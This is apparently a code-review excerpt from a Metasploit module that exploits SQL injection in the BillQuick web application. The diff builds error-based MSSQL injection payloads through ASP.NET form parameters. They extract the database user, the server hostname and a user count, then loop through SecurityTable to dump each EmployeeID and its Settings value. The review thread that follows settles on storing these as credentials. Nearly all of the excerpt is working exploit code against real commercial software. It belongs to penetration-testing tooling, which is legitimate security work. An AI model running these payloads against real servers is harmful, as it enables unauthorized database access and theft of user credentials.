modules/auxiliary/scanner/http/billquick_txtid_sqli.rb

```diff
@@ -0,0 +1,195 @@
+    /\\u0027(?<user>.+?)\\u0027/ =~ error_info(res)
+    user.slice!(header)
+    user.slice!(footer)
+    print_good("DB User: #{user}")
+
+    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 7555 IN (SELECT (#{header_char}+(SUBSTRING((ISNULL(CAST(@@SERVERNAME AS NVARCHAR(4000)),CHAR(32))),1,1024))+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
+    /\\u0027(?<hostname>.+?)\\u0027/ =~ error_info(res)
+    hostname.slice!(header)
+    hostname.slice!(footer)
+    print_good("Hostname: #{hostname}")
+
+    sec_table = "#{table.split('.')[0...-1].join('.')}.SecurityTable"
+
+    # get user count from SecurityTable
+    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 8815 IN (SELECT (#{header_char}+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
+    /\\u0027(?<user_count>.+?)\\u0027/ =~ error_info(res)
+    user_count.slice!(header)
+    user_count.slice!(footer)
+    print_good("User Count in #{sec_table}: #{user_count}")
+
+    table = Rex::Text::Table.new(
+      'Header' => sec_table,
+      'Indent' => 1,
+      'SortIndex' => -1,
+      'Columns' =>
+      [
+        'EmployeeID',
+        'Settings',
+      ]
+    )
+
+    (1..user_count.to_i).each do |index|
+      # username
+      # select EmployeeID from test.dbo.SecurityTable where ModuleID=0
+      res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 2292 IN (SELECT (#{header_char}+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM #{sec_table} WHERE ModuleID=0 AND ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP #{index - 1} ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0 ORDER BY EmployeeID) ORDER BY EmployeeID)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
+      /\\u0027(?<username>.+?)\\u0027/ =~ error_info(res)
+      username.slice!(header)
+      username.slice!(footer)
+      print_good("Username: #{username}")
+
+      # settings
+      # select Settings from test.dbo.SecurityTable where ModuleID=0
+      res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 7411 IN (SELECT (#{header_char}+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(Settings AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM #{sec_table} WHERE ModuleID=0 AND ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP #{index - 1} ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0 ORDER BY EmployeeID) ORDER BY EmployeeID)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
+      /\\u0027(?<settings>.+?)\\u0027/ =~ error_info(res)
+      settings.slice!(header)
+      settings.slice!(footer)
+      print_good("User #{username} settings: #{settings}")
+      table << [username, settings]
```

Comment:
Should we store these?  Username, hostname, employeeID seem like something we should store, or is this something we don't want to store for reuse?  Loot/note/credential?

Reply:
stored these in creds, its marked as a hash for lack of 'encrypted' as an option.  Also making an assumption these are encrypted and not some other oddity.